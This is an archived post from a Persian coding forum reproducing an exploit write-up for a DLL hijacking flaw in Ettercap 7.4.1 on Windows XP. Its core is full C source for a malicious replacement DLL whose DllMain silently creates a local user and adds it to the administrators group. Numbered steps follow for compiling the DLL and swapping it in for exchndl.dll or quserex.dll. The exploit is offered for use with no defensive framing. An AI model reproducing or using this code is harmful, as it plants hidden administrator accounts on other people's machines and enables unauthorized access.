Parsi Coders

نسخه‌ی کامل: ettercap 7.4.1 Dll hijacking vulnerability (exchndl.dll - quserex.dll)
شما در حال مشاهده نسخه آرشیو هستید. برای مشاهده نسخه کامل کلیک کنید.
از رو بیکاری Sad
http://maarek.persiangig.com/submit.txt
کد:
Exploit Title: ettercap 7.4.1 Dll hijacking vulnerability (exchndl.dll - quserex.dll)
Date: Tuesday April 24
Author: nimaarek
Vendor or Software Link: http://ettercap.sourceforge.net
Version: 7.4.1
Tested on: Windows XP SP3

       .__                                     __    
  ____ |__| _____ _____  _____ _______   ____ |  | __
/    \|  |/     \\__  \ \__  \\_  __ \_/ __ \|  |/ /
|   |  \  |  Y Y  \/ __ \_/ __ \|  | \/\  ___/|    <
|___|  /__|__|_|  (____  (____  /__|    \___  >__|_ \
     \/         \/     \/     \/            \/     \/

/*

Application Information:
Application: Ettercap.exe
Version: NG-7.4.1
Company Name: The EtterCap community, http://ettercap.sourceforge.net/
File Date: Tuesday April 24
Description: EtterCap sniffer
Operating System: Windows XP SP3
Total Extensions Verified: 2
Verified Extensions: htm;html;

=============================================================
//tested on Windows XP SP3
#include "stdafx.h"
#include "windows.h"
#include <cstdlib>

int main()
{
  system("net user apuser appass /add");
  system("net localgroup administrators apuser /add");
  exit(0);
  return 0;
}


BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        main();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }

    return TRUE;
}
=============================================================

Instructions:

1. Compile dll
2. Replace exchndl.dll Or quserex.dll in Ettercap directory with your newly compiled dll
3. Launch Ettercap
4. Bo0o0o0o0o0o0o0m !


Greet to my Lovely friends :
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+
|M|O|H|3|N|C|O|D|E|r| |a|n|d| |A|m|i|r| |N|e|m|a|t|i|
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+